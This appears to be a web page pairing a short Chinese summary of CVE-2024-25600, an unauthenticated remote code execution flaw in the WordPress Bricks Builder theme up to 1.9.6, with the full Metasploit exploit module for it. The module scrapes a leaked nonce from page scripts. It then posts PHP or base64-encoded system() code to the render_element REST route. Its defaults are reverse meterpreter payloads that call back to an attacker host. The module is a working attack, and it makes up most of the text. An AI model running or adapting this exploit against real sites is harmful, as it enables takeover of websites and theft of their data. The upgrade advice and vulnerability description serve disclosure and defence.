该漏洞存在于 WordPress 的 Bricks Builder 主题版本 1.9.6 及以下版本中，攻击者可以通过利用 nonce 泄露来绕过身份验证，并利用主题中 eval() 函数的使用来执行任意 PHP 代码，从而获得受影响 WordPress 网站的完全控制。建议升级到 1.9.6.1 或更高版本。

👨‍💻 该漏洞利用了 Bricks Builder 主题中的一个未经身份验证的远程代码执行漏洞，攻击者可以通过利用 nonce 泄露来绕过身份验证，并利用主题中 eval() 函数的使用来执行任意 PHP 代码。

🔑 nonce 泄露是攻击者绕过身份验证的主要手段。nonce 是一个随机生成的字符串，用于验证请求的合法性。攻击者可以通过分析网站的 JavaScript 代码来提取 nonce 值，并将其用于构造恶意请求。

📦 Bricks Builder 主题使用 eval() 函数来执行用户提供的代码。攻击者可以通过构造恶意请求，将包含恶意代码的请求发送到服务器，从而利用 eval() 函数执行恶意代码。

🛡️ 该漏洞的影响非常严重，攻击者可以利用该漏洞获得受影响 WordPress 网站的完全控制，包括读取和修改网站数据、上传恶意文件、执行任意代码等。

⚠️ 为了防止该漏洞被利用，建议用户尽快升级到 Bricks Builder 主题的最新版本 1.9.6.1 或更高版本。

🔒 此外，用户还可以采取一些安全措施来降低风险，例如：使用强密码、定期更新 WordPress 和主题、安装安全插件等。

This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRankinginclude Msf::Exploit::Remote::HttpClientinclude Msf::Exploit::Remote::HTTP::Wordpressprepend Msf::Exploit::Remote::AutoCheckdef initialize(info = {})super(update_info(info,'Name' => 'Unauthenticated RCE in Bricks Builder Theme','Description' => %q{This module exploits an unauthenticated remote code execution vulnerability in theBricks Builder Theme versions <= 1.9.6 for WordPress. The vulnerability allows attackersto execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication andexploit the eval() function usage within the theme. Successful exploitation allows for fullcontrol of the affected WordPress site. It is recommended to upgrade to version 1.9.6.1 or higher.},'Author' => ['Calvin Alkan', # Vulnerability discovery'Valentin Lobstein' # Metasploit module],'License' => MSF_LICENSE,'References' => [['CVE', '2024-25600'],['URL', 'https://github.com/Chocapikk/CVE-2024-25600'],['URL', 'https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6'],['WPVDB', 'afea4f8c-4d45-4cc0-8eb7-6fa6748158bd']],'DisclosureDate' => '2024-02-19','Notes' => {'Stability' => [ CRASH_SAFE ],'SideEffects' => [ IOC_IN_LOGS ],'Reliability' => [ REPEATABLE_SESSION ]},'Platform' => ['unix', 'linux', 'win', 'php'],'Arch' => [ARCH_PHP, ARCH_CMD],'Targets' => [['PHP In-Memory',{'Platform' => 'php','Arch' => ARCH_PHP,'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },'Type' => :php_memory}],['Unix In-Memory',{'Platform' => ['unix', 'linux'],'Arch' => ARCH_CMD,'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' },'Type' => :unix_memory}],['Windows In-Memory',{'Platform' => 'win','Arch' => ARCH_CMD,'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' },'Type' => :win_memory}],],'Privileged' => false))enddef fetch_nonceuri = normalize_uri(target_uri.path)res = send_request_cgi('method' => 'GET', 'uri' => uri)return nil unless res&.code == 200script_tag_match = res.body.match(%r{<script id="bricks-scripts-js-extra"[^>]>([\s\S]?)</script>})return nil unless script_tag_matchscript_content = script_tag_match[1]nonce_match = script_content.match(/"nonce":"([a-f0-9]+)"/)nonce_match ? nonce_match[1] : nilenddef exploitnonce = fetch_noncefail_with(Failure::NoAccess, 'Failed to retrieve nonce. Exiting...') unless nonceprint_good("Nonce retrieved: #{nonce}")send_request_cgi('method' => 'POST','uri' => normalize_uri(target_uri.path, 'index.php'),'ctype' => 'application/json','data' => {'postId' => rand(1..10000).to_s,'nonce' => nonce,'element' => {'name' => 'code','settings' => {'executeCode' => 'true','code' => "<?php #{payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'))"} ?>"}}}.to_json,'vars_get' => {'rest_route' => '/bricks/v1/render_element'})enddef checkreturn CheckCode::Unknown('WordPress does not appear to be online.') unless wordpress_and_online?wp_version = wordpress_versionprint_status("WordPress Version: #{wp_version}") if wp_versiontheme_check_code = check_theme_version_from_style('bricks', '1.9.6.1')return CheckCode::Unknown('The Bricks Builder theme does not appear to be installed') unless theme_check_codereturn CheckCode::Detected('The Bricks Builder theme is running but the version was unable to be determined') if theme_check_code.code == 'detected'return CheckCode::Safe("The Bricks Builder is running version: #{theme_check_code.details[:version]}, which is not vulnerable.") unless theme_check_code.code == 'appears'theme_version = theme_check_code.details[:version]print_good("Detected Bricks Builder theme version: #{theme_version}")CheckCode::Appearsendend